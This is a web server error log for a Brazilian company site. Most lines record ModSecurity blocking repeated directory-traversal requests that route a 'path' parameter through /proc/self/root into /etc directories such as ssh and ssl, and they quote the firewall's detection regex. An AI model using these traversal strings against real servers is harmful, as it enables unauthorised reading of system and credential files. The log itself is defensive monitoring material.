[Thu Mar 19 12:16:06.344467 2026] [:error] [pid 14269:tid 140411699963648] [client 74.7.241.31:53816] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwTNQbLMZ6AikZjR9VoHQAAAAU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:16:07.994118 2026] [:error] [pid 27403:tid 140411590858496] [client 74.7.241.31:53380] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwTNxkFeYa1D6dYQnD7rAAAAdI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:16:10.729853 2026] [core:alert] [pid 14269:tid 140411716749056] [client 74.7.241.31:53382] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:16:11.243277 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.241.31:53388] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwTO-yqAr6etmhZHNpqyAAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:16:13.791182 2026] [:error] [pid 27293:tid 140411733534464] [client 74.7.241.31:53396] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwTPf-YZRR_7pZ7nDKWLAAAA8E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:16:15.597948 2026] [core:alert] [pid 30077:tid 140411624429312] [client 57.141.18.76:58458] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 12:16:18.635083 2026] [:error] [pid 27403:tid 140411557287680] [client 74.7.241.31:53410] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwTQhkFeYa1D6dYQnD7rgAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:16:22.117807 2026] [proxy_fcgi:error] [pid 26799:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:54554] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:16:24.667891 2026] [:error] [pid 27293:tid 140411548894976] [client 74.7.241.31:58510] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwTSP-YZRR_7pZ7nDKWMwAAA9c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:16:27.166844 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.241.31:58516] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwTS9a6ubjKNq_cu4ZgdwAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:16:28.344337 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.241.31:58516] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwTTNa6ubjKNq_cu4ZgeAAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:16:30.855164 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.241.31:40722] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwTTgkwaGbbGflqUZDQPAAAANQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:16:41.657863 2026] [:error] [pid 30077:tid 140411725141760] [client 74.7.241.31:40728] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwTWfu8EFLIOrSqIpuyaAAAAkI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:16:43.567146 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.241.31:37010] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwTW8df6f5d65gmYZSCrQAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:16:45.811075 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.241.31:37022] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwTXQkwaGbbGflqUZDQVAAAAMw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:16:46.149792 2026] [proxy_fcgi:error] [pid 27403:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:55322] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:16:48.451501 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.241.31:40958] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwTYAkwaGbbGflqUZDQWgAAAM4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:16:51.163650 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.241.31:40962] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwTY-oXxyEfFpUF8f8YIQAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:16:51.814965 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.244.43:50688] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwTYwkwaGbbGflqUZDQYwAAANU"]
[Thu Mar 19 12:16:52.916265 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.243.128:39312] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwTZAkwaGbbGflqUZDQZQAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 12:16:55.805440 2026] [access_compat:error] [pid 17653:tid 140411716749056] [client 216.73.216.191:15616] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/goods.php
[Thu Mar 19 12:17:09.011183 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.241.31:52632] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwTdda6ubjKNq_cu4ZgmgAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:17:10.077814 2026] [proxy_fcgi:error] [pid 26799:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:56066] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:17:12.211440 2026] [:error] [pid 27403:tid 140411624429312] [client 74.7.241.31:55670] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwTeBkFeYa1D6dYQnD76QAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:17:15.959418 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.241.31:55672] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwTe-yqAr6etmhZHNpq6wAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:17:17.281471 2026] [:error] [pid 27403:tid 140411582465792] [client 74.7.243.128:33870] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwTfRkFeYa1D6dYQnD79AAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 12:17:26.762708 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:41582] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwThta6ubjKNq_cu4ZgpgAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 12:17:35.478603 2026] [:error] [pid 19093:tid 140411733534464] [client 74.7.243.128:56850] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwTj1_V7PWP6ixUYl7HHwAAAoE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 12:17:38.118942 2026] [proxy_fcgi:error] [pid 17887:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:56884] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 12:17:41.448582 2026] [:error] [pid 27403:tid 140411616036608] [client 74.7.243.128:41690] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwTlRkFeYa1D6dYQnD8BQAAAc8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 12:17:45.769924 2026] [core:alert] [pid 27403:tid 140411641214720] [client 57.141.18.113:32984] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 12:18:10.082442 2026] [mime_magic:error] [pid 30077:tid 140411725141760] (70014)End of file found: [client 57.141.18.31:33714] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 12:18:13.138008 2026] [proxy_fcgi:error] [pid 27293:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:57794] AH01075: Error dispatching request to : (polling)
